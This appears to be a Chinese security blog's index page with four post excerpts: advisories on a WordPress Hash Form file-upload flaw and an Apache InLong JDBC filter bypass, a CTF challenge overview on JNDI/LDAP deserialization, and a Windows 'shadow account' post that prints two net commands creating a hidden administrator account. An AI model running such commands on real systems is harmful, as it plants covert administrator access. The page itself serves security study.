0%

漏洞描述

WordPress的Hash表单 - 拖放表单构建器插件由于在所有版本中缺失’file_upload_action’函数中的文件类型验证,存在任意文件上传漏洞,包括1.1.0版本。这使得未经身份验证的攻击者可以在受影响站点的服务器上上传任意文件,可能导致远程代码执行。

Read more »

漏洞描述

Apache InLong 是开源的高性能数据集成框架,用于业务构建基于流式的数据分析、建模和应用。

受影响版本中,由于 MySQLSensitiveUrlUtils 类只限制了?形式的JDBC连接字符串参数,攻击者可通过()规避?引入autoDeserialize、allowLoadLocalInfile等额外的参数。并通过#注释后续内容,绕过从而此前修复过滤逻辑,在连接攻击者可控的服务地址时,攻击者可利用该漏洞远程执行任意代码。

Read more »

题目总览

考察在truestSerialData关闭的场景下通过jndi:ldap协议打本地工厂类的绕过

题目环境是其他师傅自己写出来的,题目本身无附件,只能通过heapdump进行相关的分析,在actuator/env中设置truestSerialData为false

然后依赖中是有tomcat-jdbc-9.0.83.jar以及h2-2.1.214.jar两个依赖

Read more »

影子账户

通过如下命令创建隐藏用户并加入管理员组

1
2
net user hide$ 123456 /add
net localgroup administrators hide$ /add
Read more »